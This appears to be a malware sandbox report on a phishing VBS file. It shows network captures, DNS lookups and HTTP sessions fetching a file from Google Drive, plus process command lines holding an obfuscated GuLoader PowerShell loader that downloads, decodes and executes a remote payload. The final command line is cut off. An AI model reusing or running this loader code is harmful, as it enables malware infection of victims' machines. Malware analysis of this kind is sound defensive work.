              Jul 3, 2024 08:54:22.857495070 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.857559919 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.858153105 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.858179092 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.858205080 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.858315945 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.858323097 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.862464905 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.862540007 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.862546921 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.863185883 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.863213062 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.863233089 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.863236904 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.863276958 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.863281012 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.869071960 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.869102001 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.869174957 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.869193077 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.869311094 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.869873047 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.870357037 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.870404005 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.870409012 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.872876883 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.872900963 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.872931957 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.872936964 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.872981071 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.873555899 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.874353886 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.874445915 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.874453068 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.876974106 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.877288103 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.877299070 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.877305031 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.877367020 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.877372026 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.877866983 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.879345894 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.879350901 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.883070946 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.883097887 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.883971930 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.883992910 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.883999109 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.884040117 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.884718895 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.884780884 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.884785891 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.887420893 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.887474060 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.887479067 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.887881041 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.887933969 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.887938023 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.889347076 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.889403105 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.889406919 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.893138885 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.893170118 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.893362999 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.893368006 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.894165993 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.894176960 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.894181967 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.895889997 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.895895004 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.896962881 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.897011042 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.897015095 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.897629976 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.897677898 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.897681952 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.897958040 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.898001909 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.898006916 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.901448011 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.901499987 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.901504040 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.901839972 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.902750969 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.902764082 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.902767897 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.903644085 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.903647900 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.905730009 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.905793905 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.905798912 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.906316996 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.906390905 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.906394958 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.906804085 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.906856060 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.906860113 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.911921978 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.911953926 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.911987066 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.911992073 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.911995888 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.912026882 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.917305946 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.917372942 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.917377949 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.917792082 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.917818069 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.917840004 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.917865992 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.917870998 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.917901039 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.918899059 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.918953896 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.918957949 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.929414988 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.929501057 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.929507017 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.930444956 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.930476904 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.930594921 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.930599928 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.930690050 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.933192015 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.933811903 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.933839083 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.933862925 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.933882952 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.933887959 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.933907986 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.939202070 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.939282894 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.939287901 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.939678907 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.939711094 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.939732075 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.939743996 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.939749956 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.939799070 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.940177917 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.940207005 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.940268993 CEST49707443192.168.2.7172.217.16.193
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Jul 3, 2024 08:54:19.524029016 CEST | 63294 | 53 | 192.168.2.7 | 1.1.1.1
              Jul 3, 2024 08:54:19.531003952 CEST | 53 | 63294 | 1.1.1.1 | 192.168.2.7
              Jul 3, 2024 08:54:20.596736908 CEST | 62085 | 53 | 192.168.2.7 | 1.1.1.1
              Jul 3, 2024 08:54:20.604581118 CEST | 53 | 62085 | 1.1.1.1 | 192.168.2.7
              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
              Jul 3, 2024 08:54:19.524029016 CEST | 192.168.2.7 | 1.1.1.1 | 0x85e1 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
              Jul 3, 2024 08:54:20.596736908 CEST | 192.168.2.7 | 1.1.1.1 | 0x88c1 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
              Jul 3, 2024 08:54:19.531003952 CEST | 1.1.1.1 | 192.168.2.7 | 0x85e1 | No error (0) | drive.google.com |  | 216.58.206.46 | A (IP address) | IN (0x0001) | false
              Jul 3, 2024 08:54:20.604581118 CEST | 1.1.1.1 | 192.168.2.7 | 0x88c1 | No error (0) | drive.usercontent.google.com |  | 172.217.16.193 | A (IP address) | IN (0x0001) | false
              • drive.google.com
              • drive.usercontent.google.com
              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              0 | 192.168.2.7 | 49706 | 216.58.206.46 | 443 | 8084 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-07-03 06:54:20 UTC | 215 | OUT | GET /uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
              Host: drive.google.com
              Connection: Keep-Alive
              2024-07-03 06:54:20 UTC | 1598 | IN | HTTP/1.1 303 See Other
              Content-Type: application/binary
              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
              Pragma: no-cache
              Expires: Mon, 01 Jan 1990 00:00:00 GMT
              Date: Wed, 03 Jul 2024 06:54:20 GMT
              Location: https://drive.usercontent.google.com/download?id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU&export=download
              Strict-Transport-Security: max-age=31536000
              Cross-Origin-Opener-Policy: same-origin
              Content-Security-Policy: script-src 'nonce-QrINLkwzo3nsJrVqht4yWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
              Server: ESF
              Content-Length: 0
              X-XSS-Protection: 0
              X-Frame-Options: SAMEORIGIN
              X-Content-Type-Options: nosniff
              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
              Connection: close


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              1 | 192.168.2.7 | 49707 | 172.217.16.193 | 443 | 8084 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-07-03 06:54:21 UTC | 233 | OUT | GET /download?id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU&export=download HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
              Host: drive.usercontent.google.com
              Connection: Keep-Alive
              2024-07-03 06:54:22 UTC | 4820 | IN | HTTP/1.1 200 OK
              Content-Type: application/octet-stream
              Content-Security-Policy: sandbox
              Content-Security-Policy: default-src 'none'
              Content-Security-Policy: frame-ancestors 'none'
              X-Content-Security-Policy: sandbox
              Cross-Origin-Opener-Policy: same-origin
              Cross-Origin-Embedder-Policy: require-corp
              Cross-Origin-Resource-Policy: same-site
              X-Content-Type-Options: nosniff
              Content-Disposition: attachment; filename="Fisketurens.psp"
              Access-Control-Allow-Origin: *
              Access-Control-Allow-Credentials: false
              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
              Accept-Ranges: bytes
              Content-Length: 442592
              Last-Modified: Tue, 02 Jul 2024 08:09:38 GMT
              X-GUploader-UploadID: ACJd0NoRKXCHthsJmEZV09U8vXA4B5g1kFjGJM1yU_HqBUWA4OeSmF2VIcKU8_-OjHf2KryBbyo
              Date: Wed, 03 Jul 2024 06:54:22 GMT
              Expires: Wed, 03 Jul 2024 06:54:22 GMT
              Cache-Control: private, max-age=0
              X-Goog-Hash: crc32c=ekC62A==
              Server: UploadServer
              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
              Connection: close


              Target ID:0
              Start time:02:52:40
              Start date:03/07/2024
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs"
              Imagebase:0x7ff6b1200000
              File size:170'496 bytes
              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:15
              Start time:04:17:52
              Start date:03/07/2024
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. 
auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,cbieN,]Sc=,o$XyKThoS oGkr.ad NiSen,oaTetfaf nr Ee Um dsU t ,iTrlUslUdi DnCegTreUmr tnTie SsPe1Sa2Mi8 K ');$Slutafregning=Isoelectric 'Br$ SSa.y,alS lSuoGlg.tiTos Kt ,iKuc.na ol ,.OmDN,oD,w ,n ,lMeo aa ,dSpF ,i .lF eor(Hu$MeF BoSkrf.ss m EtFoebusA.,Em$OvCD,o RaHer,krB.a UnK g oeN,m SeStn .tMa) T ';$Coarrangement=$Selverkendelsers[0];Isoleringsmateriale (Isoelectric 'In$U gK lmao HbSnaSpl.r:T OAcp.ibL,rDruHugBieNet a= (BlT Ue isAltS -AgPSaaTat ChDi E $FaCKvoMea Nr r DaEknEtgBaeA mR,eLan.at S)Ne ');while (!$Opbruget) {Isoleringsmateriale (Isoelectric 'P.$Sig.ulEmo Bbe,aT l F:FoB recag ,iI,nNon,aeUdrNo= ,$A.tBlrKyuOpe a ') ;Isoleringsmateriale $Slutafregning;Isoleringsmateriale (Isoelectric 'seSpotDiaHer Nt ,-AsSU,lUde ,e lp n Ha4 H ');Isoleringsmateriale (Isoelectric ' B$Brg ClDoo,obSpaHel.n: cORep.ybS.rVauThgUneSntco= P(,nT,oeFosT,tRi-R.PAfaRetAph T Ge$SmC,po.uaafrDorUna.snOvgRee emU.eThnOmtKu)Sk ') ;Isoleringsmateriale (Isoelectric 
'G,$ NgSvlBloPibDoaKal.i:,nHByeFrnPesDii.lgFlt as Pe ArInk BlK.rA iV.nS gSgeFln,ls .=Pl$P gUnl GoT.bMoaOplT,:NoSAvtNoyUdx.oiFeaFonf +.r+ Z%Ko$HyNDvaA,v,vl.iec r.y.VecDio.duFln Et n ') ;$Forsmtes=$Navler[$Hensigtserklringens];}$Tilvendelsens237=305549;$Urocentrummets=26395;Isoleringsmateriale (Isoelectric 'Po$.hgPrlReo ,bEmaUpl.a:ArS k FiasdJooK.oHe Op=Bi TyGChe t V- CCFro.hnUnt.peCon TtKo T$PrC,joBeaFlr.orO aFen.rg SeCam DeFonD tsp ');Isoleringsmateriale (Isoelectric 'Kl$Ang TlS,oPobB.aValSm:UnIArnCrvTrofilLevSle r De ,dRee.i I=po A [,fS yBes rtMoeLomBe.I C RoB,nCov UeKor rtBa]Pi:c.: bFDarsto UmT.BB.abusG.eFi6Er4,aS .tEnr Bi nthg .(,e$AmSRekKhi dJaoFio ,),u ');Isoleringsmateriale (Isoelectric 'Ud$IlgmelCooUnb TaRelVi:K.IdynUndJusMakMou idVesFos.rtM.nHai NnLag SeDir.ssFe Pe=.o Su[ BSZoyBas .tNyePrmAc.StTSieUdxVetOr..oEIsn.icMaoGedUniinnUdg .]Co:Ar:AnAMaSS,C ,I,mI S.A GDae.atDiSUntRerUni En WgSp(Fe$ iIHyn ,v,uo.tl uvSae ,rDieS dCoeK.) P ');Isoleringsmateriale (Isoelectric 'La$T,gDilHao MbG aPsl,i: GNdeeSumGuaRyt koafcMey GsCet L= o$,eIScnPed FsHykdeu odAfs VsTet Kn IiSanOdgK e ,r asTa.O sseuRibKls ctSerPriDonKlgFl(Fu$CaT Li,alfrvRae InindCieSilFos deLin .sBl2be3 M7C,,Sn$ayU FrM,oAacDue Sn Kt.ar muV m fm UeH tP,sYv) , ');Isoleringsmateriale $Nematocyst;"
              Imagebase:0x7ff741d30000
              File size:452'608 bytes
              MD5 hash:04029E121A0CFA5991749937DD22A1D9
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000F.00000002.2617063017.000001FADEC6A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high
              Has exited:false

              Target ID:16
              Start time:04:17:52
              Start date:03/07/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff75da10000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              Target ID:17
              Start time:04:17:54
              Start date:03/07/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t"
              Imagebase:0x7ff7454d0000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:19
              Start time:04:18:02
              Start date:03/07/2024
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ 